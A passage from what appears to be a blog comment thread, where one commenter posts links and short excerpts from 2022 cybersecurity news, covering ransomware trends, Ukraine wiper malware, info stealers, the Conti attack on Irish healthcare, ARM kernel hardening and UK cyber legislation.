https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia.
https://www.bleepingcomputer.com/news/security/new-data-wiping-malware-used-in-destructive-attacks-on-ukraine/
Tomi Engdahl says:
Manufacturing was the top industry targeted by ransomware last year https://www.tripwire.com/state-of-security/security-data-protection/manufacturing-was-the-top-industry-targeted-by-ransomware-last-year/
Global supply chains are bearing the brunt of ransomware attacks, according to a new report that finds manufacturing was the most targeted industry during 2021. Knocking financial services and insurance off the top of the heap after a long reign, the manufacturing industry was found by IBM to be the most attacked sector accounting for 23% of reports of ransomware. Thats one of the headlines from IBMs X-Force Threat Intelligence Index, which claims that more ransomware attacks were experienced by manufacturers than any other industry, and that the ripple effect of disruption caused their downstream supply chains to pressure them into paying the ransom.. Also:
https://securityintelligence.com/posts/2022-x-force-threat-intelligence-index-ransomware-resilience-tops-findings/
Tomi Engdahl says:
Mitigating kernel risks on 32-bit ARM
https://security.googleblog.com/2022/02/mitigating-kernel-risks-on-32-bit-arm.html
Linux kernel support for the 32-bit ARM architecture was contributed in the late 90s, when there was little corporate involvement in Linux development, and most contributors were students or hobbyists, tinkering with development boards, often without much in the way of documentation. Now 20+ years later, 32-bit ARM’s maintainer has downgraded its support level to ‘odd fixes,’ while remaining active as a kernel contributor. This is a common pattern for aging and obsolete
architectures: corporate funding for Linux kernel development has tremendously increased the pace of development, but only for architectures with a high return on investment.
Tomi Engdahl says:
Construction businesses: understanding the cyber threat https://www.ncsc.gov.uk/blog-post/construction-businesses-understanding-the-cyber-threat
Like many other sectors that are embracing new technologies and adopting digital ways of working, the construction industry continues to be impacted by cyber crime. Construction businesses are seen by cyber criminals as an easy target. Many have high cash-flows and make extensive use of sub-contractors and suppliers, often involving large numbers of high value payments. And although construction businesses don’t store the same kind of financial information that (for example) banks do, they still process (and have access to) valuable data.
Tomi Engdahl says:
The UK government has announced plans for new laws designed to strengthen cyber security provisions across the country. Under the new laws, British businesses will have greater legal responsibility for protecting their IT systems and data https://www.pandasecurity.com/en/mediacenter/security/new-laws-uk-cybersecurity/
Under the new laws, the government is proposing to extend these obligations to providers of outsourced IT services too. This means that any company providing IT services including cloud software and storage will need to prove their cyber defence capabilities adhere to the NIS regulations.
Tomi Engdahl says:
Financial cyberthreats in 2021
https://securelist.com/financial-cyberthreats-in-2021/105898/
The year 2021 was eventful in terms of digital threats for organizations and individuals, and financial institutions were no exception. Throughout the past year, we have seen cybercriminals continue to actively target our users with tools and techniques that emerged due to the pandemic. Imperfections in the transition to remote/hybrid work continue to pose a huge threat to businesses. On top of that, economic issues caused by the pandemic have only aggravated the problem.
Tomi Engdahl says:
Tackling Security Challenges in 5G Networks https://www.enisa.europa.eu/news/enisa-news/tackling-security-challenges-in-5g-networks
The EU Agency for Cybersecurity (ENISA) proposes good practices for the secure deployment of Network Function Virtualisation (NFV) in 5G networks.. Network Function Virtualisation is a new technology in 5G networks, which offers benefits for telecom operators in terms of flexibility, scalability, costs, and network management. However, this technology also introduces new security challenges.
Tomi Engdahl says:
Please Sign on the Dotted Line: DocuSign Phishing Attack https://www.armorblox.com/blog/blox-tales-please-sign-on-the-dotted-line-docusign-phishing-attack/
Electronic signatures have become the norm to conduct business transactions. From legal contracts, invoices, purchase orders and other legal documents, e-signature can be done without making an office visit, meeting a sales person or without the need of courier services like FedEx and UPS. The problem with electronic signatures?
They provide one more way for cybercriminals to attempt to steal identity and organizations financial and sensitive data. Malicious actors have used this process to launch phishing attacks masquerading as valid emails soliciting digital signatures.
Tomi Engdahl says:
Did we learn nothing from Y2K? Why are some coders still stuck on two digit numbers?
https://nakedsecurity.sophos.com/2022/02/25/did-we-learn-nothing-from-y2k-why-are-some-coders-still-stuck-on-two-digit-numbers/
If you use Mozilla Firefox or any Chromium-based browser, notably Google Chrome or Microsoft Edge, youll know that the version numbers of these products are currently at 97 and 98 respectively. And if youve ever looked at your browsers User-Agent string, youll know that these version numbers are, by default, transmitted to every web page you visit, as a kind of handy hint to say, Look whos coming to dinner.
Tomi Engdahl says:
Jester Stealer: An Emerging Info Stealer https://blog.cyble.com/2022/02/24/jester-stealer-an-emerging-info-stealer/
Cyble Research Labs have been actively monitoring various stealers, and recently we came across a malware sample which turned out to be Jester Stealer. Jester Stealer is an Info Stealer, which steals your sensitive information such as login credentials, cookies, credit card details, etc., and sends the exfiltrated data to Threat Actor (TA).
ester Stealer surfaced the cybercrime forums in July 2021.
Tomi Engdahl says:
Cybersecurity burnout is real. And it’s going to be a problem for all of us https://www.zdnet.com/article/cybersecurity-burnout-is-real-and-its-going-to-be-a-problem-for-all-of-us/
With the number of data breaches in 2021 soaring past that of 2020, there is even more pressure on security teams to keep businesses secure in 2022. But at a time when strength and resilience have never been more important, burnout, low staff morale and high employee turnover could put businesses on the backfoot when attempting to manage the mounting cybersecurity threat. Employers are already face something of a dilemma when it comes to cybersecurity in 2022. Not only is the number of attempted cyberattacks escalating worldwide, but employers face the added pressure of a tightening hiring market and record levels of resignations that are also affecting the tech industry.
Tomi Engdahl says:
The Hunt for the Lost Soul: Unraveling the Evolution of the SoulSearcher Malware https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware
A threat report published by Symantec in October 2021 recently caught our attention. It discusses an unknown threat actor conducting an espionage campaign in Southeast Asia using a new custom malware arsenal. What piqued our curiosity most was the mention of a DLL payload loaded from the registry that had yet to be discovered. The reason the module was difficult to find became apparent after analyzing its loader. The module is stored as a compressed blob with a custom header in the registry. It is never written to disk, rendering it unlikely to appear in datasets like VirusTotal.
Tomi Engdahl says:
Using Snort IDS Rules with NetWitness PacketDecoder https://isc.sans.edu/forums/diary/Using+Snort+IDS+Rules+with+NetWitness+PacketDecoder/28382/
NetWitness has the ability to load Snort rules on its PacketDecoder to detect and alert suspicious activity. Since it is practical to be able to see the signature makeup and what it is looking for, I created a script that parses the Snort rule tarball into a single file (list.rules), which can be pushed and loaded in all the PacketDecoders. he scripts also parse each signature into a single HTML file that can be queried to review the signature to understand what the alert is matching.
Tomi Engdahl says:
Conti ransomware attack on Irish healthcare system may cost over $100 million https://www.zdnet.com/article/cost-of-conti-ransomware-attack-on-irish-healthcare-system-may-reach-over-100-million/
An Irish news outlet is reporting that the country’s healthcare system will have to spend more than $48 million recovering from a widespread ransomware attack by the Conti group that took place last year. In a letter obtained by RTÉ, Health Service Executive interim chief information officer Fran Thompson said the costs associated with the ransomware attack include $14.2 million for ICT infrastructure, $6.1 million to pay for outside cybersecurity assistance, $17.1 million for vendor support and $9.4 million for Office 365.
Tomi Engdahl says:
The Urgency To Cyber-Secure Space Assets https://www.forbes.com/sites/chuckbrooks/2022/02/27/the-urgency-to-cyber-secure-space-assets/
Our reliance on space, and especially satellites, for communications, security, intelligence, and commerce has exponentially grown with digital transformation. Unfortunately, so have the risks, as a result, the need to prioritize cybersecurity around space assets is urgent.
Last May, the Cybersecurity and Infrastructure Security Agency (CISA) announced the formation of a Space Systems Critical Infrastructure Working Group. The group is composed of government and industry members that operates under the Critical Infrastructure Partnership Advisory Council (CIPAC) framework, bringing together space system critical infrastructure stakeholders.
Tomi Engdahl says:
2022 may be the year cybercrime returns its focus to consumers https://www.bleepingcomputer.com/news/security/2022-may-be-the-year-cybercrime-returns-its-focus-to-consumers/
Threat analysts expect 2022 to be the tipping point for a shift in the focus of hackers from large companies back to consumers. This prediction is the result of several factors that make consumers a lot more lucrative to threat actors today than in previous years.
ReasonLabs has compiled a detailed report on the status of consumer-level cybersecurity and what trends are most likely to emerge this year.